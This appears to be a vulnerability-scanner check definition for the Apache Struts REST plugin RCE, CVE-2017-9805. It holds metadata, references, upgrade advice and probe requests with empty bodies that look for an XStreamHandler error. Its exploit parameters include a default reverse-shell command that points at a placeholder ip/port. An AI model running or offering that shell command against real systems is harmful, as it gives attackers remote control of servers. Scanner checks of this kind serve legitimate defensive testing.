{
"Name": "Apache Struts CVE-2017-9805 Remote Code Execution Vulnerability",
"Description": "The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads.",
"Product": "Struts2",
"Homepage": "http://struts.apache.org/",
"DisclosureDate": "2017-09-15",
"Author": "gobysec@gmail.com",
"FofaQuery": "app=\"Struts2\"",
"GobyQuery": "app=\"Struts2\"",
"Level": "3",
"Impact": "This issue may lead to remote code execution.",
"Recommendation": "Upgrade Apache Struts to 2.3.34 or 2.5.13 or later (the fixed versions named in the description); see the S2-052 advisory in References.",
"References": [
"http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html",
"http://www.securityfocus.com/bid/100609",
"http://www.securitytracker.com/id/1039263",
"https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax",
"https://bugzilla.redhat.com/show_bug.cgi?id=1488482",
"https://cwiki.apache.org/confluence/display/WW/S2-052",
"https://lgtm.com/blog/apache_struts_CVE-2017-9805",
"https://security.netapp.com/advisory/ntap-20170907-0001/",
"https://struts.apache.org/docs/s2-052.html",
"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170907-struts2",
"https://www.exploit-db.com/exploits/42627/",
"https://www.kb.cert.org/vuls/id/112992",
"https://nvd.nist.gov/vuln/detail/CVE-2017-9805",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805"
],
"HasExp": true,
"ExpParams": [
{
"Name": "AttackType",
"Type": "select",
"Value": "goby_shell_linux,shell_cmd"
},
{
"Name": "shell_cmd",
"Type": "input",
"show": "AttackType=shell_cmd",
"Value": "bash -i >& /dev/tcp/ip/port 0>&1"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"OR",
{
"Request": {
"set_variable": ["cmd|define|text|echo asdf>asf.txt"],
"method": "POST",
"uri": "/orders",
"follow_redirect": false,
"header": {
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Referer": "http//127.0.0.1/struts2-rest-showcase/orders.xhtml",
"Accept-Language": "zh-CN,zh;q=0.8",
"Content-Type": "application/xml",
"Cookie": "JSESSIONID=23A615808B9471F4A663C12337805003;",
"Connection": "close"
},
"data_type": "text",
"data": "\n"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "500",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "XStreamHandler.toObject",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"set_variable": ["cmd|define|text|echo asdf>asf.txt"],
"method": "POST",
"uri": "/struts2-rest-showcase/orders/3",
"follow_redirect": false,
"header": {
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Referer": "http//127.0.0.1/struts2-rest-showcase/orders.xhtml",
"Accept-Language": "zh-CN,zh;q=0.8",
"Content-Type": "application/xml",
"Cookie": "JSESSIONID=23A615808B9471F4A663C12337805003;",
"Connection": "close"
},
"data_type": "text",
"data": "\n"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "500",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "XStreamHandler.toObject",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"set_variable": ["cmd|define|text|echo asdf>asf.txt"],
"method": "POST",
"uri": "/",
"follow_redirect": false,
"header": {
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Referer": "http//127.0.0.1/struts2-rest-showcase/orders.xhtml",
"Accept-Language": "zh-CN,zh;q=0.8",
"Content-Type": "application/xml",
"Cookie": "JSESSIONID=23A615808B9471F4A663C12337805003;",
"Connection": "close"
},
"data_type": "text",
"data": "\n"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "500",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "XStreamHandler.toObject",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"set_variable": ["cmd|define|text|echo asdf>asf.txt"],
"method": "POST",
"uri": "/orders",
"follow_redirect": false,
"header": {
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Referer": "http//127.0.0.1/struts2-rest-showcase/orders.xhtml",
"Accept-Language": "zh-CN,zh;q=0.8",
"Content-Type": "application/xml",
"Cookie": "JSESSIONID=23A615808B9471F4A663C12337805003;",
"Connection": "close"
},
"data_type": "text",
"data": " "
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "500",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "XStreamHandler.toObject",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"set_variable": ["cmd|define|text|echo asdf>asf.txt"],
"method": "POST",
"uri": "/struts2-rest-showcase/orders/3",
"follow_redirect": false,
"header": {
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Referer": "http//127.0.0.1/struts2-rest-showcase/orders.xhtml",
"Accept-Language": "zh-CN,zh;q=0.8",
"Content-Type": "application/xml",
"Cookie": "JSESSIONID=23A615808B9471F4A663C12337805003;",
"Connection": "close"
},
"data_type": "text",
"data": " "
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "500",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "XStreamHandler.toObject",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"set_variable": ["cmd|define|text|echo asdf>asf.txt"],
"method": "POST",
"uri": "/",
"follow_redirect": false,
"header": {
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Referer": "http//127.0.0.1/struts2-rest-showcase/orders.xhtml",
"Accept-Language": "zh-CN,zh;q=0.8",
"Content-Type": "application/xml",
"Cookie": "JSESSIONID=23A615808B9471F4A663C12337805003;",
"Connection": "close"
},
"data_type": "text",
"data": " "
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "500",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "XStreamHandler.toObject",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": null,
"Tags": [
"rce"
],
"CVEIDs": [
"CVE-2017-9805"
],
"CVSSScore": "8.1",
"AttackSurfaces": {
"Application": null,
"Support": ["Struts2"],
"Service": null,
"System": null,
"Hardware": null
},
"Disable": false
}